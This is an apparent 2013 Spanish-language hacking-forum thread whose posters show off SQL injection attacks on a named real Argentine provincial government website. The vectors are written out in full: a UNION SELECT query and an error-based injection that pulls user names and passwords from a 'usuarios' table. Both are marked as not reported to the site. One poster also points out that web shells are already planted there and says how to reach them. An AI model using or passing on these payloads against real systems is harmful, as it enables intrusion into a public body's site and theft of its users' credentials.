Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Junio 27, 2013, 06:31:25 PM

Título: SQLI http://www.vialidad.gba.gov.ar/
Publicado por: Muppet en Junio 27, 2013, 06:31:25 PM
(http://i44.tinypic.com/avpmki.png)

SQLI
Vector: http://www.vialidad.gba.gov.ar/documentos/docudetallespublicos.php?id=1393+union+select+version() limit 1,1--%20-c
Reportado: No
Título: Re:SQLI http://www.vialidad.gba.gov.ar/
Publicado por: eldb22 en Julio 21, 2013, 03:13:55 PM
¡Buenisimo! Pero no pude sacarle jugo a ese vector, todavia me falta aprender bastante de SQLi. Pero encontré otro:

Vector: http://www.vialidad.gba.gov.ar/indice.php?pagina=link_noticia&id_noticia=269%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%280x7c,%28select%20concat%28usuario,0x7c,0x636f6e74726173651f61%29%20from%20usuarios%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20%23
Reportado: no
Título: Re:SQLI http://www.vialidad.gba.gov.ar/
Publicado por: blackdrake en Julio 21, 2013, 06:35:23 PM
No sé si lo sabias o no, pero ya hay shells ahi...

Url: http://www.vialidad.gba.gov.ar/documentos/docudetallespublicos.php?id=1393 (http://www.vialidad.gba.gov.ar/documentos/docudetallespublicos.php?id=1393)

Fijate a la derecha salen muchos archivos en php, pues si le das al iconito verde entras a ese archivo, muchos están eliminados pero otros no.

Un saludo :)
Título: Re:SQLI http://www.vialidad.gba.gov.ar/
Publicado por: Muppet en Julio 25, 2013, 02:24:55 AM
Si sabia que había shell, pero queria compartir el sqli que encontre, y q de hecho parece no estar reportado, ni por mi ni por los que subieron shell